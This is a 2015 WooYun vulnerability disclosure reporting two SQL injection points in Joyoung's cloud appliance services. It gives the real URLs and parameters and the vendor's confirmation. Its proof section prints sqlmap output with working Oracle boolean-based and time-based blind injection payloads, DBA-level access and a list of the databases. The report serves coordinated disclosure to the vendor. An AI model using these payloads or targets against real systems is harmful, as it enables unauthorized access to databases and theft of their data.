当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096059

漏洞标题:九阳云家电云端注入两处

相关厂商:joyoung.com

漏洞作者: 路人甲

提交时间:2015-02-06 17:19

修复时间:2015-03-23 17:20

公开时间:2015-03-23 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

九阳云家电云端注入两处/后面还有一个有意思的.

详细说明:

注入点1:
http://service.jiuyang.com.cn/js/ajaxGetStationByCityJson.do?cityid=81C017FCBC79D04DE040007F01007E11&stationname=%25E6%2598%25A0%25E5%25B1%25B1&from=0&to=5
注入点2:
http://api.joyoung.com:8089/ia/appapi/loadimg?fileid=7b5fb6f0cbb54f93b4ebea766261e2bc

漏洞证明:

DBA权限:

web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cityid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityid=81C017FCBC79D04DE040007F01007E11' AND 1652=1652 AND 'Dnvg'='Dnvg&stationname=%E6%98%A0%E5%B1%B1&from=0&to=5
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cityid=81C017FCBC79D04DE040007F01007E11' AND 9484=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(83)||CHR(80)||CHR(115),5) AND 'taep'='taep&stationname=%E6%98%A0%E5%B1%B1&from=0&to=5
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] JIUYANGSVC
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-09 08:54

厂商回复:

感谢指出我们系统的问题,我们将尽快安排修复、加固。

最新状态:

暂无